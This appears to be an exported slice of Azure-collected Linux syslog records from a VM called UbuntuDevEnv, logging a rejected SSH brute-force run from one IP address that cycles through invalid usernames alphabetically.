+3038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:22,UbuntuDevEnv,2019-06-28 05:25:22,auth,UbuntuDevEnv,info,"Disconnecting invalid user sales 193.201.224.232 port 8678: Change of username or service not allowed: (sales,ssh-connection) -> (scan,ssh-connection) [preauth]",95477,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales,193.201.224.2,8678,,
+3039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:24,UbuntuDevEnv,2019-06-28 05:25:24,auth,UbuntuDevEnv,info,Invalid user scan from 193.201.224.232 port 11196,95491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scan,193.201.224.2,11196,,
+3040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:25,UbuntuDevEnv,2019-06-28 05:25:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:25,UbuntuDevEnv,2019-06-28 05:25:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:27,UbuntuDevEnv,2019-06-28 05:25:26,auth,UbuntuDevEnv,info,Failed password for invalid user scan from 193.201.224.232 port 11196 ssh2,95491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scan,193.201.224.2,11196,,
+3043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:27,UbuntuDevEnv,2019-06-28 05:25:26,auth,UbuntuDevEnv,info,"Disconnecting invalid user scan 193.201.224.232 port 11196: Change of username or service not allowed: (scan,ssh-connection) -> (security,ssh-connection) [preauth]",95491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scan,193.201.224.2,11196,,
+3044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:29,UbuntuDevEnv,2019-06-28 05:25:28,auth,UbuntuDevEnv,info,Invalid user security from 193.201.224.232 port 16651,95513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,security,193.201.224.2,16651,,
+3045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:29,UbuntuDevEnv,2019-06-28 05:25:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:29,UbuntuDevEnv,2019-06-28 05:25:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:30,UbuntuDevEnv,2019-06-28 05:25:30,auth,UbuntuDevEnv,info,Failed password for invalid user security from 193.201.224.232 port 16651 ssh2,95513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,security,193.201.224.2,16651,,
+3048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:30,UbuntuDevEnv,2019-06-28 05:25:30,auth,UbuntuDevEnv,info,"Disconnecting invalid user security 193.201.224.232 port 16651: Change of username or service not allowed: (security,ssh-connection) -> (service,ssh-connection) [preauth]",95513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,security,193.201.224.2,16651,,
+3049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:34,UbuntuDevEnv,2019-06-28 05:25:33,auth,UbuntuDevEnv,info,Invalid user service from 193.201.224.232 port 44926,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,193.201.224.2,44926,,
+3050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:34,UbuntuDevEnv,2019-06-28 05:25:33,auth,UbuntuDevEnv,info,Failed none for invalid user service from 193.201.224.232 port 44926 ssh2,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,193.201.224.2,44926,,
+3051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:34,UbuntuDevEnv,2019-06-28 05:25:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:34,UbuntuDevEnv,2019-06-28 05:25:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:36,UbuntuDevEnv,2019-06-28 05:25:35,auth,UbuntuDevEnv,info,Failed password for invalid user service from 193.201.224.232 port 44926 ssh2,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,193.201.224.2,44926,,
+3054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:36,UbuntuDevEnv,2019-06-28 05:25:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:38,UbuntuDevEnv,2019-06-28 05:25:37,auth,UbuntuDevEnv,info,Failed password for invalid user service from 193.201.224.232 port 44926 ssh2,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,193.201.224.2,44926,,
+3056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:38,UbuntuDevEnv,2019-06-28 05:25:37,auth,UbuntuDevEnv,info,"Disconnecting invalid user service 193.201.224.232 port 44926: Change of username or service not allowed: (service,ssh-connection) -> (setup,ssh-connection) [preauth]",95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,service,193.201.224.2,44926,,
+3057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:38,UbuntuDevEnv,2019-06-28 05:25:37,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:43,UbuntuDevEnv,2019-06-28 05:25:43,auth,UbuntuDevEnv,info,Invalid user setup from 193.201.224.232 port 53664,95568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,setup,193.201.224.2,53664,,
+3059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:43,UbuntuDevEnv,2019-06-28 05:25:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:43,UbuntuDevEnv,2019-06-28 05:25:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:46,UbuntuDevEnv,2019-06-28 05:25:45,auth,UbuntuDevEnv,info,Failed password for invalid user setup from 193.201.224.232 port 53664 ssh2,95568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,setup,193.201.224.2,53664,,
+3062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:46,UbuntuDevEnv,2019-06-28 05:25:46,auth,UbuntuDevEnv,info,"Disconnecting invalid user setup 193.201.224.232 port 53664: Change of username or service not allowed: (setup,ssh-connection) -> (shop,ssh-connection) [preauth]",95568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,setup,193.201.224.2,53664,,
+3063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:49,UbuntuDevEnv,2019-06-28 05:25:48,auth,UbuntuDevEnv,info,Invalid user shop from 193.201.224.232 port 21651,95589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shop,193.201.224.2,21651,,
+3064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:49,UbuntuDevEnv,2019-06-28 05:25:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:49,UbuntuDevEnv,2019-06-28 05:25:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:51,UbuntuDevEnv,2019-06-28 05:25:51,auth,UbuntuDevEnv,info,Failed password for invalid user shop from 193.201.224.232 port 21651 ssh2,95589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shop,193.201.224.2,21651,,
+3067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:51,UbuntuDevEnv,2019-06-28 05:25:51,auth,UbuntuDevEnv,info,"Disconnecting invalid user shop 193.201.224.232 port 21651: Change of username or service not allowed: (shop,ssh-connection) -> (sshd,ssh-connection) [preauth]",95589,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shop,193.201.224.2,21651,,
+3068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:54,UbuntuDevEnv,2019-06-28 05:25:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=sshd,95608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sshd,193.201.224.2,,0,
+3069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:57,UbuntuDevEnv,2019-06-28 05:25:56,auth,UbuntuDevEnv,info,Failed password for sshd from 193.201.224.232 port 29353 ssh2,95608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,29353,,
+3070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:57,UbuntuDevEnv,2019-06-28 05:25:57,auth,UbuntuDevEnv,info,"Disconnecting authenticating user sshd 193.201.224.232 port 29353: Change of username or service not allowed: (sshd,ssh-connection) -> (steam,ssh-connection) [preauth]",95608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,sshd,193.201.224.2,29353,,
+3071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:59,UbuntuDevEnv,2019-06-28 05:25:58,auth,UbuntuDevEnv,info,Invalid user steam from 193.201.224.232 port 36014,95625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,193.201.224.2,36014,,
+3072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:01,UbuntuDevEnv,2019-06-28 05:26:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:01,UbuntuDevEnv,2019-06-28 05:26:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:03,UbuntuDevEnv,2019-06-28 05:26:02,auth,UbuntuDevEnv,info,Failed password for invalid user steam from 193.201.224.232 port 36014 ssh2,95625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,193.201.224.2,36014,,
+3075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:05,UbuntuDevEnv,2019-06-28 05:26:05,auth,UbuntuDevEnv,info,"Disconnecting invalid user steam 193.201.224.232 port 36014: Change of username or service not allowed: (steam,ssh-connection) -> (steve,ssh-connection) [preauth]",95625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,193.201.224.2,36014,,
+3076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:07,UbuntuDevEnv,2019-06-28 05:26:07,auth,UbuntuDevEnv,info,Invalid user steve from 193.201.224.232 port 5760,95657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steve,193.201.224.2,5760,,
+3077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:07,UbuntuDevEnv,2019-06-28 05:26:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:07,UbuntuDevEnv,2019-06-28 05:26:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:09,UbuntuDevEnv,2019-06-28 05:26:09,auth,UbuntuDevEnv,info,Failed password for invalid user steve from 193.201.224.232 port 5760 ssh2,95657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steve,193.201.224.2,5760,,
+3080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:09,UbuntuDevEnv,2019-06-28 05:26:09,auth,UbuntuDevEnv,info,"Disconnecting invalid user steve 193.201.224.232 port 5760: Change of username or service not allowed: (steve,ssh-connection) -> (storwatch,ssh-connection) [preauth]",95657,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steve,193.201.224.2,5760,,
+3081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:10,UbuntuDevEnv,2019-06-28 05:26:10,auth,UbuntuDevEnv,info,Invalid user storwatch from 193.201.224.232 port 9640,95677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,storwatch,193.201.224.2,9640,,
+3082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:10,UbuntuDevEnv,2019-06-28 05:26:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:10,UbuntuDevEnv,2019-06-28 05:26:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:12,UbuntuDevEnv,2019-06-28 05:26:11,auth,UbuntuDevEnv,info,Failed password for invalid user storwatch from 193.201.224.232 port 9640 ssh2,95677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,storwatch,193.201.224.2,9640,,
+3085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:12,UbuntuDevEnv,2019-06-28 05:26:11,auth,UbuntuDevEnv,info,"Disconnecting invalid user storwatch 193.201.224.232 port 9640: Change of username or service not allowed: (storwatch,ssh-connection) -> (student,ssh-connection) [preauth]",95677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,storwatch,193.201.224.2,9640,,
+3086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:13,UbuntuDevEnv,2019-06-28 05:26:12,auth,UbuntuDevEnv,info,Invalid user student from 193.201.224.232 port 13366,95683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,193.201.224.2,13366,,
+3087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:13,UbuntuDevEnv,2019-06-28 05:26:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:13,UbuntuDevEnv,2019-06-28 05:26:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:15,UbuntuDevEnv,2019-06-28 05:26:14,auth,UbuntuDevEnv,info,Failed password for invalid user student from 193.201.224.232 port 13366 ssh2,95683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,193.201.224.2,13366,,
+3090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:16,UbuntuDevEnv,2019-06-28 05:26:15,auth,UbuntuDevEnv,info,"Disconnecting invalid user student 193.201.224.232 port 13366: Change of username or service not allowed: (student,ssh-connection) -> (superman,ssh-connection) [preauth]",95683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,193.201.224.2,13366,,
+3091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:20,UbuntuDevEnv,2019-06-28 05:26:19,auth,UbuntuDevEnv,info,Invalid user superman from 193.201.224.232 port 39553,95698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,superman,193.201.224.2,39553,,
+3092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:20,UbuntuDevEnv,2019-06-28 05:26:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:20,UbuntuDevEnv,2019-06-28 05:26:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:22,UbuntuDevEnv,2019-06-28 05:26:21,auth,UbuntuDevEnv,info,Failed password for invalid user superman from 193.201.224.232 port 39553 ssh2,95698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,superman,193.201.224.2,39553,,
+3095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:26:22,UbuntuDevEnv,2019-06-28 05:26:21,auth,UbuntuDevEnv,info,"Disconnecting invalid user superman 193.201.224.232 port 39553: Change of username or service not allowed: (superman,ssh-connection) -> (supervisor,ssh-connection) [preauth]",95698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,superman,193.201.224.2,39553,,
